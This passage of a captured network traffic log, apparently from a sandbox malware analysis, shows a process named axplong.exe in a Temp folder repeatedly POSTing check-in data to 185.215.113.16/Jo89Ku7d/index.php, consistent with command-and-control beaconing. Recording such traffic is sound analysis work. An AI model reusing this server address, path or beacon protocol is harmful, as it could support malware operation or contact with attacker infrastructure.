                  Date: Wed, 25 Sep 2024 11:53:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  3 | 192.168.2.4 | 49739 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:07.823704004 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:08.517410040 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:08.518950939 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:08.764705896 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  4 | 192.168.2.4 | 49740 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:08.884435892 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:09.581345081 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:09.582084894 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:09.811661959 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  5 | 192.168.2.4 | 49741 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:09.929166079 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:10.640786886 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:10.652060032 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:10.884042978 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  6 | 192.168.2.4 | 49742 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:10.995743990 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:11.691813946 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:11.693386078 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:11.921874046 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:11 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  7 | 192.168.2.4 | 49743 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:12.039163113 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:12.759413004 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:12.760437012 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:12.988336086 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  8 | 192.168.2.4 | 49744 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:13.105356932 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:13.814121962 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:13.815427065 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:14.048032999 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:13 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  9 | 192.168.2.4 | 49745 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:14.164294004 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:14.893877983 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:14.894581079 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:15.130125999 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  10 | 192.168.2.4 | 49746 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:15.241519928 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:15.950556040 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:15.952330112 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:16.188354015 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  11 | 192.168.2.4 | 49748 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:16.304864883 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:17.025926113 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:17.026726007 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:17.256524086 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  12 | 192.168.2.4 | 49749 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:17.367012024 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:18.198535919 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:17 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:18.215010881 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:18.597012043 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:18 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  13 | 192.168.2.4 | 49750 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:18.713906050 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:19.425087929 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:19.426007986 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                  Sep 25, 2024 13:53:19.904092073 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:19 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  14 | 192.168.2.4 | 49751 | 185.215.113.16 | 80 | 7556 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 25, 2024 13:53:20.023060083 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 25, 2024 13:53:20.733767033 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Wed, 25 Sep 2024 11:53:20 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 25, 2024 13:53:20.734658957 CEST | 308 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 154
                  Cache-Control: no-cache
